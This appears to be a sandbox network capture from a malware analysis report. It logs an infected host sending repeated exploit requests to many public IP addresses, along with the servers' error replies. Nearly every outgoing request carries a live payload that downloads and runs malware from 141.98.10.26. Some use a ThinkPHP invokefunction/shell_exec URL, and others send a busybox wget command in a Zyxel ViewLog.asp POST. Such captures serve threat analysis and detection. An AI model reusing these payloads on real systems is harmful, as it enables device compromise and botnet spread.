Nov 22, 2023 08:38:25.027667046 CET	4180	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
175	192.168.2.23	55328	94.110.3.184	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.301403046 CET	4438	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
176	192.168.2.23	42206	94.120.24.166	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.324455976 CET	4441	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
177	192.168.2.23	34200	62.29.95.169	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.326864958 CET	4441	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
178	192.168.2.23	42034	31.200.7.215	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.327131987 CET	4442	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
179	192.168.2.23	41522	62.29.30.35	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.332034111 CET	4443	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
180	192.168.2.23	47038	85.96.176.170	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.332101107 CET	4443	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:26.569284916 CET	4479	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:42:09 GMT Server: Apache Content-Length: 288 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at 192.168.0.14 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
181	192.168.2.23	59224	31.56.17.79	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.367080927 CET	4467	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
182	192.168.2.23	60326	88.99.36.64	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.460745096 CET	4468	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:26.649915934 CET	4483	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:26 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
183	192.168.2.23	58568	88.99.142.90	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.460926056 CET	4469	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:26.649975061 CET	4483	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:26 GMT Server: Apache/2.4.57 (Debian) Content-Length: 305 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6c 75 63 61 73 31 39 39 36 31 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.57 (Debian) Server at lucas19961.de Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
184	192.168.2.23	55766	85.239.232.87	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.473030090 CET	4470	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:26.640796900 CET	4481	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 22 Nov 2023 07:38:26 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
185	192.168.2.23	48916	88.221.205.146	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.481084108 CET	4471	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:26.687865973 CET	4485	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:38:26 GMT Date: Wed, 22 Nov 2023 07:38:26 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 64 62 35 33 65 31 37 26 23 34 36 3b 31 37 30 30 36 33 38 37 30 36 26 23 34 36 3b 61 38 39 38 65 30 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.8db53e17.1700638706.a898e02</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
186	192.168.2.23	58060	95.100.139.78	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.483599901 CET	4472	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:26.692569971 CET	4486	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:26 GMT Date: Wed, 22 Nov 2023 07:38:26 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 36 38 36 62 61 35 64 26 23 34 36 3b 31 37 30 30 36 33 38 37 30 36 26 23 34 36 3b 64 30 33 39 33 35 33 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.e686ba5d.1700638706.d039353e</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
187	192.168.2.23	53016	88.221.16.67	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.491841078 CET	4473	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:26.709436893 CET	4487	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:26 GMT Date: Wed, 22 Nov 2023 07:38:26 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 33 36 61 36 34 35 66 26 23 34 36 3b 31 37 30 30 36 33 38 37 30 36 26 23 34 36 3b 35 65 33 31 32 32 31 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.636a645f.1700638706.5e312217</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
188	192.168.2.23	51840	88.204.255.101	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.546052933 CET	4476	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:26.819714069 CET	4493	IN	HTTP/1.0 403 Forbidden Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 3c 21 2d 2d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 3b 0a 09 09 7d 0a 09 09 2e 6d 61 69 6e 42 6f 64 79 20 7b 0a 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 09 09 7d 0a 09 09 2e 68 65 61 64 65 72 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 33 70 78 20 73 6f 6c 69 64 20 23 65 37 33 61 32 37 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 65 6d 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 38 30 38 30 38 30 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 65 6d 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 65 6d 3b 0a 09 09 7d 0a 09 09 73 70 61 6e 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 09 09 7d 0a 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 70 78 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 38 30 38 30 38 30 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 09 09 7d 0a 09 09 2e 66 6f 6f 74 65 72 20 69 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 09 09 7d 0a 09 09 2e 6e 6f 63 73 73 20 7b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 09 7d 0a 09 2d 2d 3e 0a 09 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 42 6f 64 79 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 09 09 09 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 6e 6f 63 73 73 27 3e 3c 62 72 20 2f 3e 3c 2f 73 70 61 6e 3e 3c 69 3e 54 68 69 73 20 6d 65 73 73 61 67 65 20 77 61 73 20 63 72 65 61 74 65 64 20 62 79 20 4b 65 72 69 6f 20 43 6f 6e 74 72 6f 6c 20 50 72 6f 78 79 3c 2f 69 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Forbidden</title><style type="text/css">...body {font-family: sans-serif;padding: 1em;}.mainBody {max-width: 600px;margin: auto;}.header {border-bottom: 3px solid #e73a27;line-height: 1.5em;padding-bottom: 1em;}h1 {color: #808080;font-size: 1.5em;line-height: 1em;}span {color: #000000;font-size: 1em;}.footer {text-align: right;padding-top: 3px;color: #808080;font-weight: bold;}.footer i {font-style: normal;}.nocss {display: none;}--></style></head><body><div class="mainBody"><div class="header"><h1>Forbidden</h1><span></span></div><div class="footer"><span class='nocss'><br /></span><i>This message was created by Kerio Control Proxy</i></div></div></body></html>
Nov 22, 2023 08:38:26.819875002 CET	4494	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
189	192.168.2.23	59548	85.249.3.113	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:26.549913883 CET	4477	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
190	192.168.2.23	56808	62.29.99.242	8080
